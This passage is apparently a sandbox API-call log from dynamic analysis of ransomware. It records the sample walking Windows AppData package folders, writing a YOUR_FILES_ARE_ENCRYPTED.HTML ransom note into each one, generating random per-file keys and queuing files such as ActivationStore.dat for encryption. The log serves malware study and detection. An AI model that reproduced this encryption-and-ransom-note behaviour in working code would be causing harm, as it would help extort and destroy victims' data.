pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0119.662] GetProcessHeap () returned 0x600000 [0119.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.663] WriteFile (in: hFile=0x31c, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.664] CloseHandle (hObject=0x31c) returned 1 [0119.664] GetProcessHeap () returned 0x600000 [0119.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.664] GetProcessHeap () returned 0x600000 [0119.664] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.664] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9866f95d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9866f95d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9866f95d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0119.664] StrStrIW (lpFirst="Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.664] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy") returned 178 [0119.664] GetProcessHeap () returned 0x600000 [0119.664] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.664] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy" [0119.664] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\*" [0119.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9866f95d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9866f95d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9866f95d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.665] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9866f95d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9866f95d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9866f95d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.665] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9866f95d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9866f95d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9866f95d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0119.665] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.665] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore") returned 194 [0119.665] GetProcessHeap () returned 0x600000 [0119.665] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.665] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore" [0119.665] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\*" [0119.666] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9866f95d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9866f95d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x986e1f11, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e918, dwReserved1=0x6f5ea0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.668] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9866f95d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9866f95d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x986e1f11, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e918, dwReserved1=0x6f5ea0, cFileName="..", cAlternateFileName="")) returned 1 [0119.668] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9866f95d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x98a031ac, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x98a031ac, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315e918, dwReserved1=0x6f5ea0, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0119.668] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.668] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 214 [0119.668] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.668] lstrlenW (lpString=".dat") returned 4 [0119.668] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.668] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\microsoft.windows.secondarytileexperience_10.0.0.0_neutral__cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0119.669] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=8192) returned 1 [0119.669] GetProcessHeap () returned 0x600000 [0119.669] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.672] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="40") returned 2 [0119.672] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="F6") returned 2 [0119.672] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="7F") returned 2 [0119.672] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="3F") returned 2 [0119.672] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="6E") returned 2 [0119.672] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="A8") returned 2 [0119.672] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="21") returned 2 [0119.672] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="23") returned 2 [0119.672] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="79") returned 2 [0119.672] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="EE") returned 2 [0119.672] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="2F") returned 2 [0119.672] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="91") returned 2 [0119.672] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="A1") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="0B") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="70") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="C1") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="70") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="C7") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="48") returned 2 [0119.673] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="BA") returned 2 [0119.673] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="FA") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="2A") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="2E") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="7B") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="F5") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="5A") returned 2 [0119.673] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="10") returned 2 [0119.673] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="61") returned 2 [0119.673] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="22") returned 2 [0119.673] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="01") returned 2 [0119.673] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="4A") returned 2 [0119.673] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="73") returned 2 [0119.674] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0119.674] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.674] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.674] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x986e1f11, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x986e1f11, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x986e1f11, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x315e918, dwReserved1=0x6f5ea0, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0119.674] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.674] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 219 [0119.674] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.674] lstrlenW (lpString=".LOG1") returned 5 [0119.674] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.674] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x986e1f11, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x986e1f11, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x986e1f11, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e918, dwReserved1=0x6f5ea0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0119.674] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.674] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 219 [0119.674] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.674] lstrlenW (lpString=".LOG2") returned 5 [0119.674] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.674] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x986e1f11, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x986e1f11, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x986e1f11, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315e918, dwReserved1=0x6f5ea0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0119.675] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.675] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 224 [0119.675] GetProcessHeap () returned 0x600000 [0119.675] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\microsoft.windows.secondarytileexperience_10.0.0.0_neutral__cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.676] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.677] CloseHandle (hObject=0x320) returned 1 [0119.677] GetProcessHeap () returned 0x600000 [0119.677] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.678] GetProcessHeap () returned 0x600000 [0119.678] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.678] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9866f95d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9866f95d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9866f95d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0119.678] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.678] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 208 [0119.678] GetProcessHeap () returned 0x600000 [0119.678] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\microsoft.windows.secondarytileexperience_10.0.0.0_neutral__cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.681] WriteFile (in: hFile=0x31c, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.682] CloseHandle (hObject=0x31c) returned 1 [0119.682] GetProcessHeap () returned 0x600000 [0119.682] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.682] GetProcessHeap () returned 0x600000 [0119.682] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.684] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0119.684] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.684] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState") returned 117 [0119.684] GetProcessHeap () returned 0x600000 [0119.684] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.685] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState" [0119.685] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\*" [0119.685] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.685] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, 